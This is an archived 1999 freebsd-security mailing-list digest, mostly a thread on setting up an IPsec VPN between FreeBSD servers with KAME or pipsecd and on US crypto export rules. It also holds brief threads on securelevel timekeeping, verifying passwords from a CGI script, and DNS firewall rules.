Message-Id: <1.5.4.32.19990823023043.009dfd54@mymail.com.br>
Date: Sun, 22 Aug 1999 23:30:43 -0300
To: freebsd-security@freebsd.org
From: Fabio da Silva Cunha
Subject: VPN for FreeBSD 2.2.8 and 3.2

Hi Friends!

I need to make a VPN between three FreeBSD 2.2.8/3.2 Servers.

Any software recommendations?

FreeBSD Supports IPSec?

Topology:

              [---------]                  [---------]
              [ FreeBSD ]                  [ FreeBSD ]
    LAN A   --[    1    ]---> INTERNET <---[    2    ]--  LAN B
    10.1.x.x  [   3.2   ]        |         [  2.2.8  ]    10.2.x.x
              [---------]        |         [---------]
                                 |
                                 |
                            [---------]
                            [ FreeBSD ]
                            [    3    ]--  LAN C
                            [  2.2.8  ]    10.3.x.x
                            [---------]

Thanks in Advance!

Best Regards,

Fábio da Silva Cunha

From owner-freebsd-security Sun Aug 22 19:38:29 1999
Date: Mon, 23 Aug 1999 12:39:37 +1000 (EST)
From: Nicholas Brawn
To: Fabio da Silva Cunha
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-Reply-To: <1.5.4.32.19990823023043.009dfd54@mymail.com.br>

Have a look at www.kame.net, and see if it fits your requirements. KAME is
a freely available IPv6 & IPSec stack for BSD (developed in Japan).

Cheers,
Nick

On Sun, 22 Aug 1999, Fabio da Silva Cunha wrote:

> Hi Friends!
>
> I need to make a VPN between three FreeBSD 2.2.8/3.2 Servers.
>
> Any software recommendations?
>
> FreeBSD Supports IPSec?
>
> Topology:
>
>               [---------]                  [---------]
>               [ FreeBSD ]                  [ FreeBSD ]
>     LAN A   --[    1    ]---> INTERNET <---[    2    ]--  LAN B
>     10.1.x.x  [   3.2   ]        |         [  2.2.8  ]    10.2.x.x
>               [---------]        |         [---------]
>                                  |
>                                  |
>                             [---------]
>                             [ FreeBSD ]
>                             [    3    ]--  LAN C
>                             [  2.2.8  ]    10.3.x.x
>                             [---------]
>
> Thanks in Advance!
>
> Best Regards,
>
> Fábio da Silva Cunha

From owner-freebsd-security Sun Aug 22 19:56:30 1999
From: "Chris Knight"
Subject: RE: VPN for FreeBSD 2.2.8 and 3.2
Date: Mon, 23 Aug 1999 12:53:57 +1000
Message-ID: <001501beed12$bf071820$0200a8c0@nts-ts1.aims.private>
In-reply-to: <1.5.4.32.19990823023043.009dfd54@mymail.com.br>
Reply-To: chris@aims.com.au

Howdy,

Try pipsecd in the ports tree. It's a lot easier to get a working tunnel
up and running than KAME.
Regards,
Chris Knight
Systems Administrator
AIMS Independent Computer Professionals
Tel: +61 3 6334 6664  Fax: +61 3 6331 7032  Mob: +61 419 528 795
Web: http://www.aims.com.au

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Fabio da Silva
> Cunha
> Sent: Monday, 23 August 1999 12:31
> To: freebsd-security@FreeBSD.ORG
> Subject: VPN for FreeBSD 2.2.8 and 3.2
>
>
> Hi Friends!
>
> I need to make a VPN between three FreeBSD 2.2.8/3.2 Servers.
>
> Any software recommendations?
>
> FreeBSD Supports IPSec?
>
> Topology:
>
>               [---------]                  [---------]
>               [ FreeBSD ]                  [ FreeBSD ]
>     LAN A   --[    1    ]---> INTERNET <---[    2    ]--  LAN B
>     10.1.x.x  [   3.2   ]        |         [  2.2.8  ]    10.2.x.x
>               [---------]        |         [---------]
>                                  |
>                                  |
>                             [---------]
>                             [ FreeBSD ]
>                             [    3    ]--  LAN C
>                             [  2.2.8  ]    10.3.x.x
>                             [---------]
>
> Thanks in Advance!
>
> Best Regards,
>
> Fábio da Silva Cunha

From owner-freebsd-security Sun Aug 22 20: 3:15 1999
Message-Id: <1.5.4.32.19990823030416.009fbf08@mymail.com.br>
Date: Mon, 23 Aug 1999 00:04:16 -0300
To: chris@aims.com.au
From: Fabio da Silva Cunha
Subject: RE: VPN for FreeBSD 2.2.8 and 3.2
Cc: freebsd-security@FreeBSD.ORG

Hi!

At 12:53 23/08/1999 +1000, you wrote:
>Howdy,
>  Try pipsecd in the ports tree. It's a lot easier to get a working tunnel up
>and running than KAME.
>

What crypto does this support?

DES / 3DES / BlowFish ?

regards

Fábio da Silva Cunha

From owner-freebsd-security Sun Aug 22 20:12:22 1999
From: Darren Reed
Message-Id: <199908230311.NAA21286@cheops.anu.edu.au>
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
To: ncb@zip.com.au (Nicholas Brawn)
Date: Mon, 23 Aug 1999 13:11:23 +1000 (EST)
Cc: fsc@mymail.com.br, freebsd-security@FreeBSD.ORG
In-Reply-To: from "Nicholas Brawn" at Aug 23, 99 12:39:37 pm

In some mail from Nicholas Brawn, sie said:
>
> Have a look at www.kame.net, and see if it fits your requirements. KAME is
> a freely available IPv6 & IPSec stack for BSD (developed in Japan).

You mean it's not yet integrated into FreeBSD ?!
From owner-freebsd-security Sun Aug 22 20:13:23 1999
From: "Chris Knight"
Subject: RE: VPN for FreeBSD 2.2.8 and 3.2
Date: Mon, 23 Aug 1999 13:10:15 +1000
Message-ID: <002501beed15$05e4a800$0200a8c0@nts-ts1.aims.private>
In-reply-to: <1.5.4.32.19990823030416.009fbf08@mymail.com.br>
Reply-To: Chris@aims.com.au

From the README file:

Currently implements:
- IPSEC-compliant IP tunnelling (i.e., tunnel-mode only):
  - authentication: IP-AH (RFC 2402) and HMAC (RFC 2104) with:
      RFC 2403: MD5 (HMAC-MD5-96)
      RFC 2404: SHA1 (HMAC-SHA1-96)
      RIPEMD160 (HMAC-RIPEMD160-96)
  - encryption: IP-ESP (RFC 2406) with:
      Blowfish in CBC mode.
      RFC 2405: DES in CBC mode.
      DES3 in CBC mode.
      CAST in CBC mode.
      IDEA in CBC mode.

Regards,
Chris Knight
Systems Administrator
AIMS Independent Computer Professionals
Tel: +61 3 6334 6664  Fax: +61 3 6331 7032  Mob: +61 419 528 795
Web: http://www.aims.com.au

> -----Original Message-----
> From: Fabio da Silva Cunha [mailto:fsc@mymail.com.br]
> Sent: Monday, 23 August 1999 13:04
> To: chris@aims.com.au
> Cc: freebsd-security@FreeBSD.ORG
> Subject: RE: VPN for FreeBSD 2.2.8 and 3.2
>
>
> Hi!
>
> At 12:53 23/08/1999 +1000, you wrote:
> >Howdy,
> >  Try pipsecd in the ports tree. It's a lot easier to get
> a working tunnel up
> >and running than KAME.
> >
>
> What crypto does this support?
>
> DES / 3DES / BlowFish ?
>
> regards
>
> Fábio da Silva Cunha

From owner-freebsd-security Sun Aug 22 20:14:57 1999
Message-ID: <19990822231452.A18458@amber.org>
Date: Sun, 22 Aug 1999 23:14:52 -0400
From: Christopher Petrilli
To: freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
References: <199908230311.NAA21286@cheops.anu.edu.au>
In-Reply-To: <199908230311.NAA21286@cheops.anu.edu.au>; from Darren Reed on Mon, Aug 23, 1999 at 01:11:23PM +1000

On Mon, Aug 23, 1999 at 01:11:23PM +1000, Darren Reed wrote:
> In some mail from Nicholas Brawn, sie said:
> >
> > Have a look at www.kame.net, and see if it fits your requirements.
> > KAME is
> > a freely available IPv6 & IPSec stack for BSD (developed in Japan).
>
> You mean it's not yet integrated into FreeBSD ?!

No, and never will be so long as ITAR stands, and the FreeBSD group is
based in the United States. This is why OpenBSD has to jump through so
many hoops to stay legal.

Unfortunately, the KAME integration isn't for the faint of heart.

Chris
--
| Christopher Petrilli        ``Television is bubble-gum for
| petrilli@amber.org            the mind.''-Frank Lloyd Wright

From owner-freebsd-security Sun Aug 22 20:24:23 1999
To: Christopher Petrilli
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-reply-to: Your message of "Sun, 22 Aug 1999 23:14:52 EDT." <19990822231452.A18458@amber.org>
Date: Sun, 22 Aug 1999 20:22:40 -0700
Message-ID: <4613.935378560@localhost>
From: "Jordan K. Hubbard"

> No, and never will be so long as ITAR stands, and the FreeBSD group is
> based in the United States. This is why OpenBSD has to jump through so
> many hoops to stay legal.

I'm not really sure that ITAR will be standing in its current form for
much longer. :)

- Jordan

From owner-freebsd-security Sun Aug 22 20:36:56 1999
From: Darren Reed
Message-Id: <199908230336.NAA21519@cheops.anu.edu.au>
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
To: petrilli@amber.org (Christopher Petrilli)
Date: Mon, 23 Aug 1999 13:36:16 +1000 (EST)
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <19990822231452.A18458@amber.org> from "Christopher Petrilli" at Aug 22, 99 11:14:52 pm

In some mail from Christopher Petrilli, sie said:
>
> On Mon, Aug 23, 1999 at 01:11:23PM +1000, Darren Reed wrote:
> > In some mail from Nicholas Brawn, sie said:
> > >
> > > Have a look at www.kame.net, and see if it fits your requirements. KAME is
> > > a freely available IPv6 & IPSec stack for BSD (developed in Japan).
> >
> > You mean it's not yet integrated into FreeBSD ?!
>
> No, and never will be so long as ITAR stands, and the FreeBSD group is
> based in the United States. This is why OpenBSD has to jump through so
> many hoops to stay legal.

Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear
stands around making grizzly noises at people, it seems.

> Unfortunately, the KAME integration isn't for the faint of heart.
> Chris

FreeBSD appears to be doing better than the other two groups in terms
of resources...there are ways around it although I'm disappointed to
see that FreeBSD isn't interested.
From owner-freebsd-security Sun Aug 22 20:43: 2 1999
To: Darren Reed
Cc: petrilli@amber.org (Christopher Petrilli), freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-reply-to: Your message of "Mon, 23 Aug 1999 13:36:16 +1000." <199908230336.NAA21519@cheops.anu.edu.au>
Date: Sun, 22 Aug 1999 20:42:46 -0700
Message-ID: <4726.935379766@localhost>
From: "Jordan K. Hubbard"

> Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear
> stands around making grizzly noises at people, it seems.

I wouldn't count on that. As far as I can tell, what's holding KAME
integration up is the fact that they're not done merging with INRIA yet.
Once that happens, I'm more than happy to continue to lean on Justice
Maryln Patel's decision on crypto as free speech in the S.F. Bay Area
region. We've already talked to our lawyer, he said it looked legit to
him, and so we've been shipping crypto on our CDs for over a year now. I
even announced it back then, to almost no audience reaction whatsoever.
It seems that people like to get more excited about the prospect of
something being closed than it being opened up. :)

> FreeBSD appears to be doing better than the other two groups in terms
> of resources...there are ways around it although I'm disappointed to
> see that FreeBSD isn't interested.

FreeBSD is certainly interested. Don't believe everything you hear from
the user community.

- Jordan

From owner-freebsd-security Sun Aug 22 20:43:54 1999
Message-ID: <19990822234351.D18458@amber.org>
Date: Sun, 22 Aug 1999 23:43:51 -0400
From: Christopher Petrilli
To: freebsd-security@FreeBSD.ORG
Cc: avalon@coombs.anu.edu.au
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
References: <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au>
In-Reply-To: <199908230336.NAA21519@cheops.anu.edu.au>; from Darren Reed on Mon, Aug 23, 1999 at 01:36:16PM +1000

On Mon, Aug 23, 1999 at 01:36:16PM +1000, Darren Reed wrote:
> In some mail from Christopher Petrilli, sie said:
> >
> > On Mon, Aug 23, 1999 at 01:11:23PM +1000, Darren Reed wrote:
> > > In some mail from Nicholas Brawn, sie said:
> > > >
> > > > Have a look at www.kame.net, and see if it fits your requirements. KAME is
> > > > a freely available IPv6 & IPSec stack for BSD (developed in Japan).
> > >
> > > You mean it's not yet integrated into FreeBSD ?!
> >
> > No, and never will be so long as ITAR stands, and the FreeBSD group is
> > based in the United States. This is why OpenBSD has to jump through so
> > many hoops to stay legal.
>
> Bah, so FreeBSD will be InSecureBSD ?
> Well, so long as the ITAR bear
> stands around making grizzly noises at people, it seems.

Is this flamebait really necessary? FreeBSD is hardly insecure, and for
99.999999% of the situations, set up by a knowledgeable administrator, is
every bit as secure as OpenBSD, or anything else.

IPsec, while a great idea, has hardly been a resounding success outside
of tightly controlled remote access VPN solutions at companies. If
you've ever tried to set it up, you'd understand why. Without a complete
PKI infrastructure to back it up, it won't ever succeed. Been there,
done that.

Additionally, many applications are VERY sensitive to latency
introduction, especially things like VoIP and video, and in that
situation, software solutions aren't acceptable because of their
non-deterministic behaviour.

> > Unfortunately, the KAME integration isn't for the faint of heart.
> >
> > Chris
>
> FreeBSD appears to be doing better than the other two groups in terms
> of resources...there are ways around it although I'm disappointed to
> see that FreeBSD isn't interested.

I doubt it's a lack of interest, but a lack of someone taking the
initiative... someone in a country that could deal with it, and deal
with all the other nightmarish issues of distribution since Walnut
Creek couldn't do it any more.
Chris
-- 
| Christopher Petrilli    ``Television is bubble-gum for
| petrilli@amber.org        the mind.'' -Frank Lloyd Wright

From owner-freebsd-security Sun Aug 22 22:27:02 1999
Date: Sun, 22 Aug 1999 23:26:30 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Christopher Petrilli
Cc: freebsd-security@FreeBSD.ORG, avalon@coombs.anu.edu.au
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
Message-ID: <37C0DB86.838CF89E@softweyr.com>
References: <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org>

Christopher Petrilli wrote:
>
> On Mon, Aug 23, 1999 at 01:36:16PM +1000, Darren Reed wrote:
> >
> > Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear
> > stands around making grizzly noises at people, it seems.
>
> Is this flamebait really necessary? FreeBSD is hardly insecure, and for
> 99.999999% of the situations, set up by a knowledgeable administrator, is
> every bit as secure as OpenBSD, or anything else.

Apparently Darren didn't read the blurbs about the Linux Death Match
at the recent Chaos Computer Club campout in Germany. It was won by
a FreeBSD box with NO offensive effort, only defense.

InSecureBSD my ass.
-- 
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                Softweyr LLC
http://softweyr.com/                                   wes@softweyr.com

From owner-freebsd-security Sun Aug 22 22:39:35 1999
Date: Mon, 23 Aug 1999 07:38:22 +0200
From: Poul-Henning Kamp
To: Ollivier Robert
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
In-reply-to: Your message of "Sun, 22 Aug 1999 22:34:15 +0200." <19990822223415.A11240@keltia.freenix.fr>
Message-ID: <7173.935386702@critter.freebsd.dk>

In message <19990822223415.A11240@keltia.freenix.fr>, Ollivier Robert writes:
>According to Poul-Henning Kamp:
>> no.
>
>It is perfectly understandable when taking into account the time we have
>before the release but I'd like to see it in 4.0. Or, if we don't want to jump
>to ntpd, at least upgrade the ancient version we have...

Ohh, yeah, of course it should be done before 4.0

-- 
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!
From owner-freebsd-security Sun Aug 22 23:06:55 1999
Date: Mon, 23 Aug 1999 07:48:04 +0200
From: Ollivier Robert
To: freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
Message-ID: <19990823074804.A15716@keltia.freenix.fr>
References: <1.5.4.32.19990823030416.009fbf08@mymail.com.br>
In-Reply-To: <1.5.4.32.19990823030416.009fbf08@mymail.com.br>; from Fabio da Silva Cunha on Mon, Aug 23, 1999 at 12:04:16AM -0300

According to Fabio da Silva Cunha:
> What crypto this supports?
>
> DES / 3DES / BlowFish ?

Whatever is supported by OpenSSL. Pipsecd doesn't contain any crypto. It was
developed by a FreeBSD committer BTW: Pierre Beyssac.

-- 
Ollivier ROBERT -=- FreeBSD: The Power to Serve!
-=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999

From owner-freebsd-security Sun Aug 22 23:32:28 1999
Date: Mon, 23 Aug 1999 08:30:48 +0200
From: "Thomas Uhrfelt"
To: "Ollivier Robert"
Subject: RE: VPN for FreeBSD 2.2.8 and 3.2
In-Reply-To: <19990823074804.A15716@keltia.freenix.fr>

And all I can say is that this beautifully constructed piece of software works
flawlessly for me. Both KAME and SKIP failed to work due to various reasons
ranging from stupid administrator (me!), driver packet corruption, bugs in
software etc. not to mention our highly unorthodox network topology .. but
ipsecd had no problem dealing with our network (which incorporates VPNs
between 5 countries and hidden segments)

My hat off to Pierre and let us all hope that he will continue to develop and
enhance ipsecd. If this had been committed to the ports tree a while back I
would have saved myself 2 months of grief with SKIP/KAME.
Regards,

Thomas Uhrfelt

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Ollivier Robert
> Sent: 23 August 1999 07:48
> To: freebsd-security@FreeBSD.ORG
> Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
>
>
> According to Fabio da Silva Cunha:
> > What crypto this supports?
> >
> > DES / 3DES / BlowFish ?
>
> Whatever is supported by OpenSSL. Pipsecd doesn't contain any
> crypto. It was
> developed by a FreeBSD committer BTW: Pierre Beyssac.
> --
> Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=-
> roberto@keltia.freenix.fr
> FreeBSD keltia.freenix.fr 4.0-CURRENT #73: Sat Jul 31 15:36:05 CEST 1999
>

From owner-freebsd-security Mon Aug 23 00:35:25 1999
To: "Thomas Uhrfelt"
Cc: "Ollivier Robert", freebsd-security@FreeBSD.ORG
In-reply-to: thomas.uhrfelt's message of Mon, 23 Aug 1999 08:30:48 +0200.
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
From: itojun@iijlab.net
Date: Mon, 23 Aug 1999 16:34:36 +0900
Message-ID: <29268.935393676@coconut.itojun.org>

>And all I can say is that this beautifully constructed piece of software works
>flawlessly for me. Both KAME and SKIP failed to work due to various reasons
>ranging from stupid administrator (me!), driver packet corruption, bugs in
>software etc. not to mention our highly unorthodox network topology .. but
>ipsecd had no problem dealing with our network (which incorporates VPNs
>between 5 countries and hidden segments)

Could you send us more detail about your troubles with KAME? I'd love to
fix those, especially if it is due to KAME bugs.

itojun@kame

From owner-freebsd-security Mon Aug 23 00:53:35 1999
To: "Jordan K. Hubbard"
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: jkh's message of Sun, 22 Aug 1999 20:42:46 MST.
  <4726.935379766@localhost>
Subject: IPsec/IPv6
From: itojun@iijlab.net
Date: Mon, 23 Aug 1999 16:53:09 +0900
Message-ID: <29578.935394789@coconut.itojun.org>

>> Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear
>> stands around making grizzly noises at people, it seems.
>I wouldn't count on that. As far as I can tell, what's holding KAME
>integration up is the fact that they're not done merging with INRIA
>yet.

Some news about NRL/INRIA/KAME merging (unified-ipv6).

The unified-ipv6 project has been in big trouble with manpower and design
differences. Recently the situation changed for all of us, so here's the
decision we have made.

NRL decided to concentrate on IPsec (because in the US there is not as
much interest in IPv6 as in IPsec - people in the US are lucky about IPv4
address space, it seems). INRIA will be doing future research on top of
KAME code. KAME agreed to add some knobs that help INRIA do their
experiments.

So, it is planned that KAME will have an alias: "unified-ipv6". The KAME
team is trying to ship KAME/OpenBSD and KAME/BSDI4 during this month or
next month (September). The KAME September 30th STABLE kit will officially
have the "unified-ipv6" alias on it.

It is now okay to merge KAME code into FreeBSD, I believe. If you do not
feel ready, I'll be visiting FreeBSDCon so let's talk about it there (but
that will cause a 2 month delay from now).

The biggest problem is how to keep multiple repositories in sync. KAME
(= unified-ipv6) code shares most of the IPv6 code among *BSD platforms.
If the FreeBSD repository is modified after import, and that conflicts
with content in the KAME repository, we can't merge that back in. So I
would like to suggest that the FreeBSD project refrain from changing the
IPv6 part too much, for a certain amount of time (*).
Rather, please send diffs to KAME.

>Once that happens, I'm more than happy to continue to lean on
>Justice Marilyn Patel's decision on crypto as free speech in the S.F.
>Bay Area region. We've already talked to our lawyer, he said it
>looked legit to him, and so we've been shipping crypto on our CDs for
>over a year now. I even announced it back then, to almost no audience
>reaction whatsoever. It seems that people like to get more excited
>about the prospect of something being closed than it being opened
>up. :)

It now happened, so please contact Mr. Patel:-) The KAME team really
needs your suggestions on how to integrate the crypto part. In the case
of the NetBSD/KAME integration, we did it like this:
- place the IPsec core part and the AH part into cvs.netbsd.org (in the US)
- place the ESP part and the crypto algorithms (DES, Blowfish and whatever)
  in cvs.fi.netbsd.org (in Finland)
We need some tricky symbolic link, or makefile/config hack, for this
separated repository (NetBSD has a makefile and config hack).

itojun

(*) As a side note: actually, KAME and unified-ipv6 have been experiencing
big trouble sharing IPv6 code among *BSD, due to FreeBSD's variable
renaming like ifa_list (ifa_link on others) or time_second (why FreeBSD
couldn't reuse time.tv_sec to hold this? I don't get it). I'd like to
propose fixing those back to the more standard ones (ifa_link or
time.tv_sec) for portability among *BSD. If you are okay, those changes
will come with the FreeBSD/KAME integration.
From owner-freebsd-security Mon Aug 23 04:47:48 1999
Date: 23 Aug 1999 12:13:10 +0200
From: Juergen Nickelsen
To: "Jordan K. Hubbard"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
References: <4726.935379766@localhost>
In-Reply-To: "Jordan K. Hubbard"'s message of "Sun, 22 Aug 1999 20:42:46 -0700"

"Jordan K. Hubbard" writes on freebsd-security:

> [...] we've been shipping crypto on our CDs for over a year now. I
> even announced it back then, to almost no audience reaction
> whatsoever. It seems that people like to get more excited about
> the prospect of something being closed than it being opened up. :)

Jordan, I *am* excited that you are shipping a really complete system,
and I have been from the day I heard it. Not that we outside the US (as
in Germany, where I live) wouldn't be able to get equivalent crypto
solutions otherwise, but the US's crypto export regulations are such a
stupid nuisance. For this reason I am always excited when it gets
closer to shut them down.
Greetings,
-- 
Juergen Nickelsen

From owner-freebsd-security Mon Aug 23 05:26:05 1999
Date: Mon, 23 Aug 1999 09:26:28 -0300 (GMT)
From: Fernando Schapachnik
To: colinj@cs.unm.edu (Colin Eric Johnson)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: getting passwored data via a perl cgi
In-Reply-To: from Colin Eric Johnson at "Aug 22, 99 09:57:31 am"
Message-Id: <199908231226.JAA05046@ns1.sminter.com.ar>

In an earlier message, Colin Eric Johnson wrote:
>
> I'm in the process of writing a cgi script in perl that should verify
> people against the machine's password file. The problem that I am running
> into is that if the script is run by anyone other than root I get an
> empty encrypted password field.
>
> I don't want to run the cgi SUID root as this doesn't seem safe.
>
> Is there a way to allow other users access to the complete password database?
> I understand, basically, why this is restricted but I'm not sure how else
> to solve this given FreeBSD's restrictions.

For a similar problem I decided to use the SuExec feature of Apache.
Basically you create a wrapper that talks to a suid program exchanging
minimum (and because of this, easily verified) information. SuExec
performs a *lot* of security checks. You can read more about SuExec in
the Apache documentation.
Good luck!

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA
Diagonal Roque Sáenz Peña 971, 4th and 5th floor.
1035 - Capital Federal, Argentina.
(54-11) 4323-3333
http://www.via-net-works.net.ar

From owner-freebsd-security Mon Aug 23 11:26:09 1999
Date: Mon, 23 Aug 1999 12:22:57 -0600
From: Wes Peters
Organization: Softweyr LLC
To: E Kovarski, Alex Nash, freebsd-security@freebsd.org, advocacy@freebsd.org
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
Message-ID: <37C19181.9046615A@softweyr.com>
References: <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org> <37C0DB86.838CF89E@softweyr.com> <87k8qnauj4.fsf@nyctereutes.digitalized.com>

E Kovarski wrote:
> Wes Peters writes:
> > Christopher Petrilli wrote:
> > >
> > > On Mon, Aug 23, 1999 at 01:36:16PM +1000, Darren Reed wrote:
> > > >
> > > > Bah, so FreeBSD will be InSecureBSD ?
> > > > Well, so long as the ITAR bear
> > > > stands around making grizzly noises at people, it seems.
> > >
> > > Is this flamebait really necessary? FreeBSD is hardly insecure, and for
> > > 99.999999% of the situations, set up by a knowledgeable administrator, is
> > > every bit as secure as OpenBSD, or anything else.
> >
> > Apparently Darren didn't read the blurbs about the Linux Death Match
> > at the recent Chaos Computer Club campout in Germany. It was won by
> > a FreeBSD box with NO offensive effort, only defense.
> >
> > InSecureBSD my ass.
>
> Would you happen to have a link to the mentioned "Linux Death Match?"

Several others have asked for this as well, so here's the first mention
of it:

http://www.computerworld.com/home/news.nsf/all/9908102chaos

The Chaos Computer Club has a page of links to mentions of their Camp in
the press at:

https://www.ccc.de/camp/pressreviews.html

For your reading enjoyment.

-- 
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                Softweyr LLC
http://softweyr.com/                                   wes@softweyr.com

From owner-freebsd-security Mon Aug 23 11:32:12 1999
Message-Id: <199908231831.MAA40570@harmony.village.org>
To: Greg Black
Subject: Re: Securelevel 3 ant setting time
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: Your
  message of "Sun, 22 Aug 1999 18:09:09 +1000." <19990822080909.6389.qmail@alice.gba.oz.au>
References: <19990822080909.6389.qmail@alice.gba.oz.au> <6639.935186801@critter.freebsd.dk>
Date: Mon, 23 Aug 1999 12:31:16 -0600
From: Warner Losh

In message <19990822080909.6389.qmail@alice.gba.oz.au> Greg Black writes:
: entirely useful. Will version 4 be part of the 3.3 release?

Nope. Version 4 is still, IIRC, in beta. A Version 4 port may be
included, however.

Warner

From owner-freebsd-security Mon Aug 23 11:35:44 1999
Date: Mon, 23 Aug 1999 12:35:47 -0600
From: Warner Losh
To: freebsd-security@FreeBSD.ORG
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-reply-to: Your message of "Sun, 22 Aug 1999 20:42:46 PDT." <4726.935379766@localhost>
References: <4726.935379766@localhost>
Message-Id: <199908231835.MAA40614@harmony.village.org>

: > Bah, so FreeBSD will be InSecureBSD ? Well, so long as the ITAR bear
: > stands around making grizzly noises at people, it seems.

InSecureBSD? I don't think so. FreeBSD takes security very seriously...
I think that since we're based in the bay area that export of crypto is
completely legal.

Warner
FreeBSD Security Officer

From owner-freebsd-security Mon Aug 23 11:39:09 1999
Date: Mon, 23 Aug 1999 12:37:35 -0600
From: Warner Losh
To: Christopher Petrilli
Cc: freebsd-security@FreeBSD.ORG, avalon@coombs.anu.edu.au
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-reply-to: Your message of "Sun, 22 Aug 1999 23:43:51 EDT." <19990822234351.D18458@amber.org>
References: <19990822234351.D18458@amber.org> <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au>
Message-Id: <199908231837.MAA40646@harmony.village.org>

In message <19990822234351.D18458@amber.org> Christopher Petrilli writes:
: Is this flamebait really necessary? FreeBSD is hardly insecure, and for
: 99.999999% of the situations, set up by a knowledgeable administrator, is
: every bit as secure as OpenBSD, or anything else.

In the extreme edge cases, as well as for bundled crypto OpenBSD has a
slight edge here. FreeBSD is certainly secure enough for most people's
needs, and getting more so all the time.
Warner

From owner-freebsd-security Mon Aug 23 11:39:36 1999
Date: Mon, 23 Aug 1999 12:38:16 -0600
From: Warner Losh
To: Wes Peters
Cc: Christopher Petrilli, freebsd-security@FreeBSD.ORG, avalon@coombs.anu.edu.au
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
In-reply-to: Your message of "Sun, 22 Aug 1999 23:26:30 MDT." <37C0DB86.838CF89E@softweyr.com>
References: <37C0DB86.838CF89E@softweyr.com> <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org>
Message-Id: <199908231838.MAA40659@harmony.village.org>

In message <37C0DB86.838CF89E@softweyr.com> Wes Peters writes:
: Apparently Darren didn't read the blurbs about the Linux Death Match
: at the recent Chaos Computer Club campout in Germany. It was won by
: a FreeBSD box with NO offensive effort, only defense.
Seems like we should have a pointer from our web site for that :-)

Warner

From owner-freebsd-security Mon Aug 23 11:40:25 1999
Message-Id: <199908231840.MAA40683@harmony.village.org>
To: Wes Peters
Subject: Re: VPN for FreeBSD 2.2.8 and 3.2
Cc: E Kovarski, Alex Nash, freebsd-security@FreeBSD.ORG, advocacy@FreeBSD.ORG
In-reply-to: Your message of "Mon, 23 Aug 1999 12:22:57 MDT."
  <37C19181.9046615A@softweyr.com>
References: <37C19181.9046615A@softweyr.com> <19990822231452.A18458@amber.org> <199908230336.NAA21519@cheops.anu.edu.au> <19990822234351.D18458@amber.org> <37C0DB86.838CF89E@softweyr.com> <87k8qnauj4.fsf@nyctereutes.digitalized.com>
Date: Mon, 23 Aug 1999 12:40:49 -0600
From: Warner Losh

In message <37C19181.9046615A@softweyr.com> Wes Peters writes:
: Several others have asked for this as well, so here's the first
: mention of it:
: http://www.computerworld.com/home/news.nsf/all/9908102chaos

Yes, but where's the claymation MPEG of the Linux Death Match :-)

Warner

From owner-freebsd-security Mon Aug 23 12:35:36 1999
Date: Mon, 23 Aug 1999 13:35:21 -0600
From: Nate Williams
Reply-To: nate@mt.sri.com (Nate Williams)
To: freebsd-security@FreeBSD.org
Subject: IPFW/DNS rules
Message-Id: <199908231935.NAA01122@mt.sri.com>

I have a public DNS server that I need people to be able to query, but
is there anything I can do to avoid anyone doing anything 'nasty' to it.
Also, I need to open up access to it to those hosts that secondary me,
as well as those I secondary for. (I also want to make sure that none
of my internal hosts 'leak' DNS stuff, but that they also all go through
the DNS server in order to find hosts...)

I've got some rules in place, but if someone has gotten DNS firewall
rules I'd be grateful to see them.

Thanks!

Nate

From owner-freebsd-security Mon Aug 23 12:48:36 1999
Date: Mon, 23 Aug 1999 12:48:09 -0700 (PDT)
From: Matthew Dillon
To: Nate Williams
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: IPFW/DNS rules
References: <199908231935.NAA01122@mt.sri.com>
Message-Id: <199908231948.MAA10395@apollo.backplane.com>

:I've got some rules in place, but if someone has gotten DNS firewall
